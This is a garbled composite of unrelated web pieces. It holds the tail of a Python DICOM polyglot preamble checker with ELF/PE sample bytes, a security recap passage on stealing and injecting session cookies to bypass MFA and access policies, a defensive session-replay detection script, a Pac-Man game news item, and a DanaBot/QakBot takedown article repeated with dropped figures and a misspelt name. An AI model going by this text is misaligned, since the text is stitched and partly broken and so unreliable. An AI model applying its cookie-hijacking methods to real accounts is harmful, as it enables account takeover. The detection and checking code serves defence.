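    The preamble is `preamble_start` padded with nulls to 128 bytes, followed
    by "DICM" and one File Meta element, (0002,0010) Transfer Syntax UID, so
    the sample looks like the start of a real file.
    """
    preamble = preamble_start.ljust(PREAMBLE_LEN, b"\x00")
    if not with_prefix:
        return preamble
    transfer_syntax = b"1.2.840.10008.1.2.1\x00"   # Explicit VR LE, 20 bytes
    meta = b"\x02\x00\x10\x00" + b"UI" + b"\x14\x00" + transfer_syntax
    return preamble + DICM_PREFIX + meta


if __name__ == "__main__":
    samples = {
        "plain DICOM": make_sample(b""),
        "TIFF-DICOM": make_sample(b"II*\x00\x08\x00\x00\x00"),
        "ELF polyglot": make_sample(b"\x7fELF\x02\x01\x01"),
        "PE polyglot": make_sample(b"MZ\x90\x00"),
        "unknown preamble": make_sample(b"GIF89a"),
        "no DICM prefix": make_sample(b"", with_prefix=False),
    }
    for label, blob in samples.items():
        v = check_preamble(blob)
        state = "ALLOW" if v.allowed else "BLOCK"
        print(f"{label:18} -> {state:5} ({v.reason})")
```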
"Threat actors often use infostealers to extract authentication tokens directly from a victim's machine or buy them directly through darkness markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policies (CAPs) and maintain persistent access." Authentication cookies can also be stolen using adversary-in-the-middle (AitM) phishing kits in real-time, or using rogue browser extensions that request excessive permissions to interact with web sessions, modify page content, and extract stored authentication data. Once installed, the extension can access the browser's storage API, intercept network requests, or inject malicious JavaScript into active sessions to harvest real-time session cookies. "By leveraging stolen session cookies, an adversary can bypass authentication mechanisms, gaining seamless entry into cloud environments without requiring user credentials," Varonis said. "Beyond initial access, session hijacking can facilitate lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing permissions or misconfigured roles." 🎥 Cybersecurity Webinars Non-Human Identities: The AI Backdoor You're Not Watching → AI agents rely on Non-Human Identities (like service accounts and API keys) to function—but these are often left untracked and unsecured. As attackers shift focus to this hidden layer, the risk is growing fast. In this session, you'll learn how to find, secure, and monitor these identities before they're exploited. Join the webinar to understand the real risks behind AI adoption—and how to stay ahead. Inside the LOTS Playbook: How Hackers Stay Undetected → Attackers are using trusted sites to stay hidden. 
In this webinar, Zscaler experts share how they detect these stealthy LOTS attacks using insights from the world's largest security cloud. Join to learn how to spot hidden threats and improve your defense.

🔧 Cybersecurity Tools

ScriptSentry → A free tool that scans your environment for dangerous logon script misconfigurations—like plaintext credentials, insecure file/share permissions, and references to non-existent servers. These overlooked issues can enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them across large Active Directory environments.

Aftermath → A Swift-based, open-source tool for macOS incident response. It collects forensic data—like logs, browser activity, and process info—from compromised systems, then analyzes it to build timelines and track infection paths. Deploy via MDM or run manually. Fast, lightweight, and ideal for post-incident investigation.

AI Red Teaming Playground Labs → An open-source training suite with hands-on challenges designed to teach security professionals how to red team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injections, safety bypasses, indirect attacks, and Responsible AI failures. Built on Chat Copilot and deployable via Docker, it's a practical resource for testing and understanding real-world AI vulnerabilities.

🔒 Tip of the Week

Review and Revoke Old OAuth App Permissions — They're Silent Backdoors → You've likely logged into apps using "Continue with Google," "Sign in with Microsoft," or GitHub/Twitter/Facebook logins. That's OAuth. But did you know many of those apps still have access to your data long after you stop using them? Why it matters: Even if you delete the app or forget it existed, it might still have ongoing access to your calendar, email, cloud files, or contact list — no password needed. If that third party gets breached, your data is at risk.
What to do: Go through your connected apps:

Google: myaccount.google.com/permissions
Microsoft: account.live.com/consent/Manage
GitHub: github.com/settings/applications
Facebook: facebook.com/settings?tab=applications

Revoke anything you don't actively use. It is a fast, silent cleanup that closes doors you didn't know were open. Revoking a grant invalidates the refresh token the app holds, so it cannot fetch anything further, but it does not recover data the app has already copied.

Conclusion

Looking ahead, it's not just about tracking threats; it's about understanding what they reveal. Every tactic used, every system tested, points to deeper issues in how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper awareness and faster response loops. The takeaways from this week aren't just technical: they speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to react, but to rethink what "secure" really needs to mean in today's environment.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
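The session-hijacking passage above describes the attacker side (cookies injected into a client that mimics the victim's OS, browser and network). As an added example of the defender side, written for this page rather than taken from Varonis or the recap, the script below groups sign-in records by session id, anchors each session to the device fingerprint and network that completed interactive MFA, and flags later token-based sign-ins that contradict that anchor. The record layout, field names, sample events and the 60-minute threshold are all constructed assumptions for the example, not any vendor's log schema.

```python
"""Flag replayed session cookies in sign-in records.

Heuristic: a session is anchored to the device fingerprint and network that
completed interactive MFA. Later token-based (non-interactive) sign-ins on the
same session id that come from a different device fingerprint, or from two
networks too close together in time to be one laptop moving, are flagged.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample records, not real log data. The field names and values
# are an assumption made for this example, not any vendor's sign-in schema.
SAMPLE_EVENTS: List[Dict] = [
    # alice: MFA from the office network, normal token use 30 minutes later,
    # then the same session id used from a second network 15 minutes after
    # that with an identical OS/browser (what a cookie-injection tool mimics).
    {"time": "2025-05-23T09:00:00Z", "user": "alice", "session_id": "S1",
     "auth": "interactive_mfa", "ip": "203.0.113.10", "asn": 64500,
     "os": "Windows 11", "browser": "Chrome 136"},
    {"time": "2025-05-23T09:30:00Z", "user": "alice", "session_id": "S1",
     "auth": "token", "ip": "203.0.113.10", "asn": 64500,
     "os": "Windows 11", "browser": "Chrome 136"},
    {"time": "2025-05-23T09:45:00Z", "user": "alice", "session_id": "S1",
     "auth": "token", "ip": "198.51.100.7", "asn": 64496,
     "os": "Windows 11", "browser": "Chrome 136"},
    # bob: cookie replayed from the same network but a different OS/browser.
    {"time": "2025-05-23T10:00:00Z", "user": "bob", "session_id": "S2",
     "auth": "interactive_mfa", "ip": "203.0.113.22", "asn": 64500,
     "os": "Windows 11", "browser": "Edge 136"},
    {"time": "2025-05-23T10:05:00Z", "user": "bob", "session_id": "S2",
     "auth": "token", "ip": "203.0.113.22", "asn": 64500,
     "os": "macOS 15", "browser": "Chrome 136"},
    # carol: benign; the same laptop goes home and reuses its session in the
    # evening, hours after the last office use.
    {"time": "2025-05-23T11:00:00Z", "user": "carol", "session_id": "S3",
     "auth": "interactive_mfa", "ip": "203.0.113.30", "asn": 64500,
     "os": "Windows 11", "browser": "Chrome 136"},
    {"time": "2025-05-23T18:30:00Z", "user": "carol", "session_id": "S3",
     "auth": "token", "ip": "192.0.2.55", "asn": 64501,
     "os": "Windows 11", "browser": "Chrome 136"},
]


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_session_replay(events: List[Dict], min_travel_minutes: int = 60) -> List[Dict]:
    """Return one alert per suspicious token-based sign-in.

    min_travel_minutes: two different ASNs on one session closer together than
    this are treated as concurrent use rather than a device changing networks.
    """
    by_session: Dict[Tuple[str, str], List[Dict]] = defaultdict(list)
    for event in events:
        by_session[(event["user"], event["session_id"])].append(event)

    alerts: List[Dict] = []
    for (user, session_id), session_events in by_session.items():
        session_events.sort(key=lambda e: _ts(e["time"]))
        baseline_fp = None   # (os, browser) seen at interactive MFA
        last_net = None      # (asn, time) of the most recent sign-in
        for event in session_events:
            fingerprint = (event["os"], event["browser"])
            when = _ts(event["time"])
            reason = None
            if event["auth"] == "interactive_mfa":
                # A fresh interactive proof re-anchors the session.
                baseline_fp = fingerprint
            elif baseline_fp is None:
                reason = "token use with no interactive sign-in in this session"
            elif fingerprint != baseline_fp:
                reason = "device fingerprint changed without re-authentication"
            elif (last_net is not None and event["asn"] != last_net[0]
                  and when - last_net[1] < timedelta(minutes=min_travel_minutes)):
                reason = (f"session used from two networks (AS{last_net[0]} and "
                          f"AS{event['asn']}) within {min_travel_minutes} minutes")
            if reason:
                alerts.append({"user": user, "session_id": session_id,
                               "time": event["time"], "ip": event["ip"],
                               "reason": reason})
            last_net = (event["asn"], when)
    return alerts


if __name__ == "__main__":
    for alert in detect_session_replay(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['user']} {alert['session_id']} "
              f"from {alert['ip']}: {alert['reason']}")
```

The fingerprint check is exactly what a careful attacker defeats by cloning the victim's OS and browser strings, which is why the second check matters: as long as the victim keeps using the stolen session too, the token shows up on two networks in a window too short for one device to have moved, regardless of how well the user agent is mimicked. Where the identity provider offers device-bound or token-protected sessions, that binding is the stronger control; this kind of correlation is a detection backstop for sessions that are not bound.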
  • 'Shadow Labyrinth' Injects Some Pac-Man Nostalgia Into Its Latest Trailer

    Bandai Namco has released a new trailer for its upcoming Pac-Man re-imagining Shadow Labyrinth, and if previous glimpses of the game perhaps didn't convince you, then this latest effort may just bring you on board with its nostalgic elements.
    The new trailer showcases a series of mazes that look a lot more like the traditional Pac-Man experience you're perhaps more used to. There are a few interesting elements, mind you, including boost pads that speed Pac-Man (or "Puck", as it's known here) along a straight line, along with the ability to jump and bash into platforms, thus causing them to move or fall down.
    It's looking pretty sweet, and it's worth noting that this one is scheduled to launch on both the Switch and Switch 2, so we'd expect the latter to showcase some sizable performance upgrades.
    Whichever you opt to get, the game will launch on 18th July 2025. The core gameplay sees you take on the role of "The Swordsman", who must survive in a deadly world filled with fearsome creatures, all the while utilising Puck to gobble up enemies and gain vital upgrades.
    Images: Bandai Namco Entertainment



    What are your thoughts on this one so far? Will you be picking up Shadow Labyrinth when it launches in July? Let us know with a comment.

    Nintendo Life’s resident horror fanatic, when he’s not knee-deep in Resident Evil and Silent Hill lore, Ollie likes to dive into a good horror book while nursing a lovely cup of tea. He also enjoys long walks and listens to everything from TOOL to Chuck Berry.


    WWW.NINTENDOLIFE.COM
  • U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation

    The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization.
    The malware, the DoJ said, infected more than 300,000 victim computers around the world, facilitated fraud and ransomware, and caused at least $50 million in damages. Two of the defendants, Aleksandr Stepanov (aka JimmBee), 39, and Artem Aleksandrovich Kalinkin (aka Onix), 34, both from Novosibirsk, Russia, are currently at large.
    Stepanov has been charged with conspiracy, conspiracy to commit wire fraud and bank fraud, aggravated identity theft, unauthorized access to a protected computer to obtain information, unauthorized impairment of a protected computer, wiretapping, and use of an intercepted communication. Kalinkin has been charged with conspiracy to gain unauthorized access to a computer to obtain information, to gain unauthorized access to a computer to defraud, and to commit unauthorized impairment of a protected computer.
    The unsealed criminal complaint and indictment show that many of the defendants, including Kalinkin, exposed their real-life identities after infecting their own systems with the malware.
    "In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware," the complaintread. "In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake."

    "The inadvertent infections often resulted in sensitive and compromising data being stolen from the actor's computer by the malware and stored on the DanaBot servers, including data that helped identify members of the DanaBot organization."
    If convicted, Kalinkin faces a statutory maximum sentence of 72 years in federal prison; Stepanov faces up to five years. Concurrently, the law enforcement effort, carried out as part of Operation Endgame, saw DanaBot's command-and-control (C2) servers seized, including dozens of virtual servers hosted in the United States.
    "DanaBot malware used a variety of methods to infect victim computers, including spam email messages containing malicious attachments or hyperlinks," the DoJ said. "Victim computers infected with DanaBot malware became part of a botnet, enabling the operators and users of the botnet to remotely control the infected computers in a coordinated manner."
    DanaBot, like the recently dismantled Lumma Stealer malware, operates under a malware-as-a-service (MaaS) scheme, with the administrators leasing out access for $500 to "several thousand dollars" a month. Tracked under the monikers Scully Spider and Storm-1044, DanaBot is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID, capable of acting as a stealer and as a delivery vector for next-stage payloads such as ransomware.
    The Delphi-based modular malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information, user browsing histories, stored account credentials, and virtual currency wallet information. It can also provide full remote access, log keystrokes, and capture videos. It's been active in the wild since its debut in May 2018, when it started off as a banking trojan.
    Example of typical Danabot infrastructure
    "DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018," CrowdStrike said. "The malware's popularity grew due to its early modular development supporting Zeus-based web injects, information stealer capabilities, keystroke logging, screen recording, and hidden virtual network computingfunctionality."
    According to Black Lotus Labs and Team Cymru, DanaBot employs a layered communications infrastructure between a victim and the botnet controllers, wherein the C2 traffic is proxied through two or three server tiers before it reaches the final level. At least five to six tier-2 servers were active at any given time. A majority of DanaBot victims are concentrated around Brazil, Mexico, and the United States.
    "The operators have shown their commitment to their craft, adapted to detection and changes in enterprise defense, and with later iterations, insulating the C2s in tiers to obfuscate tracking," the companies said. "Throughout this time, they have made the bot more user-friendly with structured pricing and customer support."
    High-level diagram of multi-tiered C2 architecture
    The DoJ said DanaBot administrators operated a second version of the botnet that was specially designed to target victim computers in military, diplomatic, government, and related entities in North America and Europe. This variant, emerging in January 2021, came fitted with capabilities to record all interactions happening on a victim device and send the data to a different server.
    "Pervasive malware like DanaBot harms hundreds of thousands of victims around the world, including sensitive military, diplomatic, and government entities, and causes many millions of dollars in losses," said United States Attorney Bill Essayli for the Central District of California.
    The DoJ also credited several private-sector firms (Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, SpyCloud, Team Cymru, and Zscaler) for providing "valuable assistance."
    Some of the noteworthy aspects of DanaBot, compiled from various reports, are below:

    DanaBot's sub-botnet 5 received commands to download a Delphi-based executable used to conduct HTTP-based distributed denial-of-service (DDoS) attacks against the Ukrainian Ministry of Defence (MOD) webmail server and the National Security and Defense Council (NSDC) of Ukraine in March 2022, shortly after Russia's invasion of the country
    Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes likely with an aim to further intelligence-gathering activities on behalf of Russian government interests
    DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to date (the most recent version is 4006, compiled in March 2025)
    The malware's infrastructure consists of multiple components: a "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionality, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication
    DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe
    The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers
    DanaBot's developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles
    DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025

    Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape.
    "Cybercriminal disruptions and law enforcement actions not only impair malware functionality and use but also impose a cost to threat actors by forcing them to change their tactics, cause mistrust in the criminal ecosystem, and potentially make criminals think about finding a different career," Selena Larson, a staff threat researcher at Proofpoint, said.

    "These successes against cyber criminals only come about when business IT teams and security service providers share much-needed insight into the biggest threats to society, affecting the greatest number of people around the world, which law enforcement can use to track down the servers, infrastructure, and criminal organizations behind the attacks. Private and public sector collaboration is crucial to knowing how actors operate and taking action against them."
    DanaBot's features as promoted on its support site
    DoJ Unseals Charges Against QakBot Leader
    The development comes as the DoJ unsealed charges against a 48-year-old Moscow resident, Rustam Rafailevich Gallyamov, for leading efforts to develop and maintain the QakBot malware, which was disrupted in a multinational operation in August 2023. The agency also filed a civil forfeiture complaint against over million in cryptocurrency seized from Gallyamov over the course of the investigation.
    "Gallyamov developed, deployed, and controlled the Qakbot malware beginning in 2008," the DoJ said. "From 2019 onward, Gallyamov allegedly used the Qakbot malware to infect thousands of victim computers around the world in order to establish a network, or 'botnet,' of infected computers."
    The DoJ revealed that, following the takedown, Gallyamov and his co-conspirators continued their criminal activities by switching to other tactics like "spam bomb" attacks in order to gain unauthorized access to victim networks and deploy ransomware families like Black Basta and CACTUS. Court documents accuse the e-crime group of engaging in these methods as recently as January 2025.
    "Mr. Gallyamov's bot network was crippled by the talented men and women of the FBI and our international partners in 2023, but he brazenly continued to deploy alternative methods to make his malware available to criminal cyber gangs conducting ransomware attacks against innocent victims globally," said Assistant Director in Charge Akil Davis of the FBI's Los Angeles Field Office.

    THEHACKERNEWS.COM
win for defenders and that it will have an impact on the cybercriminal threat landscape. "Cybercriminal disruptions and law enforcement actions not only impair malware functionality and use but also impose a cost to threat actors by forcing them to change their tactics, cause mistrust in the criminal ecosystem, and potentially make criminals think about finding a different career," Selena Larson, a staff threat researcher at Proofpoint, said. "These successes against cyber criminals only come about when business IT teams and security service providers share much-needed insight into the biggest threats to society, affecting the greatest number of people around the world, which law enforcement can use to track down the servers, infrastructure, and criminal organizations behind the attacks. Private and public sector collaboration is crucial to knowing how actors operate and taking action against them." DanaBot's features as promoted on its support site DoJ Unseals Charges Against QakBot Leader The development comes as the DoJ unsealed charges against a 48-year-old Moscow resident, Rustam Rafailevich Gallyamo, for leading efforts to develop and maintain the QakBot malware, which was disrupted in a multinational operation in August 2023. The agency also filed a civil forfeiture complaint against over $24 million in cryptocurrency seized from Gallyamov over the course of the investigation. "Gallyamov developed, deployed, and controlled the Qakbot malware beginning in 2008," the DoJ said. "From 2019 onward, Gallyamov allegedly used the Qakbot malware to infect thousands of victim computers around the world in order to establish a network, or 'botnet,' of infected computers." The DoJ revealed that, following the takedown, Gallyamov and his co-conspirators continued their criminal activities by switching to other tactics like "spam bomb" attacks in order to gain unauthorized access to victim networks and deploy ransomware families like Black Basta and CACTUS. 
Court documents accuse the e-crime group of engaging in these methods as recently as January 2025.

"Mr. Gallyamov's bot network was crippled by the talented men and women of the FBI and our international partners in 2023, but he brazenly continued to deploy alternative methods to make his malware available to criminal cyber gangs conducting ransomware attacks against innocent victims globally," said Assistant Director in Charge Akil Davis of the FBI's Los Angeles Field Office.